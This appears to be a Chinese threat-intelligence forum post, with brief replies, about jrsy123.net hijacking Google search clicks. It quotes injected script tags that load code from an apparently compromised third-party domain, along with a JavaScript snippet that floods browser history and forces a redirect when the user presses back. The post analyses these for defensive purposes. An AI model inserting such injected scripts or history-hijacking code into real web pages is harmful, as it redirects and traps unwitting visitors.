入侵 xss 恶意网站 web应用漏洞利用 系统漏洞利用
jrsy123.net 劫持Google搜索
qctech 2019-05-20 18:18:58 633人浏览

警告!在复现此情报时,请注意将修改 www.errthfrdet.top 的hosts,否则可能造成影响!

开始

打开 https://www.google.com/search?q=jrsy123 或google搜索 jrsy123

你会发现,搜索结果很正常对吧?

image.png

(注:截图上的字被浏览器插件自动替换)

在google开启新标签页打开时,点击该搜索结果,会被跳转

image.png

(左边的是google搜索的标签页,被XSS?)

大概原因是利用html history api 修改历史页面,待详细调查

另外,www.errthfrdet.top这个网站被劫持(对来源网址进行判断,正常访问时无异常),据猜测可能是wordpress某个恶意插件导致,待调查

被劫持时,顶部代码增加了

<link class="chun" type="text/css" rel="stylesheet" href="https://www.errthfrdet.top/assets/GHmqx/1/2/css/grid.css?v=0325">
<script language="javascript" src="https://www.errthfrdet.top/assets/GHmqx/1/2/index.php"></script>
<script language="javascript" src="https://www.errthfrdet.top/assets/GHmqx/1/js/g-1.php"></script>

另附疑似罪魁祸首脚本:

        var zmid=Math.random().toString(36).substr(2);
        window.history.replaceState(null, '', 'go.php?s='+zmid);
        window.history.pushState('go.php?s='+zmid, '', 'go.php?s='+zmid);
        window.history.pushState('go.php?s='+zmid, '', 'go.php?s='+zmid);
        window.history.pushState('go.php?s='+zmid, '', 'go.php?s='+zmid);
        window.history.pushState('go.php?s='+zmid, '', 'go.php?s='+zmid);
        window.history.pushState('go.php?s='+zmid, '', 'go.php?s='+zmid);
        window.addEventListener("popstate", function(e) {
            if(document.URL.indexOf("go.php?s="+zmid) >= 0){
                document.location.href = document.location;
            }
        });

另,如无法复现请尝试清除Cookie

域名(3) 威胁情报数目 子域名 历史指向ip 相关样本 微步标签 < 1/1 >
匿名用户 2019-05-21 18:39:38 回复
学习
匿名用户 2019-05-21 15:05:44 回复
受插件影响吧
匿名用户 2019-05-20 19:16:23 回复
同意楼上,
匿名用户 2019-05-20 18:39:20 回复
也有一种可能,www.errthfrdet.top根本就没有被劫持,它本来就是用来躲避封锁的